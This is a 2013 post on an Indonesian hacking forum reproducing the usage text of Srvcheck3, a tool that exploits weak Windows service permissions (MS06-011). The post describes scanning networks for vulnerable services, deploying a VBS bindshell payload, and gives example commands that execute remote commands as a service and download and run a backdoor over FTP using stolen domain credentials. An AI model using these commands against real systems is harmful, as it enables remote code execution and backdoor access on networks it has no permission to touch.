Blog Roll

Group Facebook

XCode Magazine


Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Welcome! Anonymous

Windows Security Services checker ( srvcheck )

[ Facebook comments]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

Windows Security Services checker ( srvcheck )

Postby poni » Mon Apr 22, 2013 9:10 pm


Code: Select all

Srvcheck is a proof of concept for the MS06-011 (http://www.microsoft.com/technet/security/Bulletin/MS06-011.mspx). This tool scans your network for weak service DACLs and enumerates vulnerable services.
Due to the fact that those permissive dacls allows remote authenticate users to modify the command that is executed, srvcheck deploys an vbs payload that will execute a bindshell.

At this time, several products are affected for this vulnerability so once you get a valid domain user, srvcheck allows you to get access into several systems.


The public version, srvcheck2 was improved. The new payload deployed with srvcheck3 works tranfering files by ftp, and allows faster network scanning.

Usage Information:
Srvcheck 3 - Windows Services ACL permission Scanner
(c) 2006 - 2008 Andres Tarasco - [email protected]
* PRIVATE BUILD for PENTESTERS - http://www.tarasco.org

Available parameters for SrvCheck3:

Srvcheck3.exe -l [options] List vulnerable services (locally or remotely)
-H Host|[ip1-ip2] Specify a remote host/s to connect (netbiosname/ip(s))
-f file Specify a ip/host file to audit (for example net view >file.txt)
Srvcheck3.exe -m service -c command Executes a remote command running as service
Srvcheck3.exe -m service [options] Executes backdoor or command for that service
-r ftphost ftpport backdoorfile Download configuration)
[-o optionalparameter] Additional parameter to be added to backdoorfile
You should also use always -u DOMAIN\user and -p password flags unless running from a domain shell

Srvcheck3.exe -l (list local vulnerabilities)
Srvcheck3.exe -l -H -u domainuser -p domainpass
Srvcheck3.exe -l -f hosts.txt -u DOMAINuser -p password (list remote vulnerabilities)
Srvcheck3.exe -m service -H host -c "cmd.exe /c md c:\PWNED"
Srvcheck3.exe -m vulnservice -H -u domainuser -p domainpass -r 21 backdoor.exe (exe
cutes backdoor.exe bindshell)
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
User avatar
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

leave a comment

Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 19 guests

Web Counter Start : December 14th 2009
Hit Counters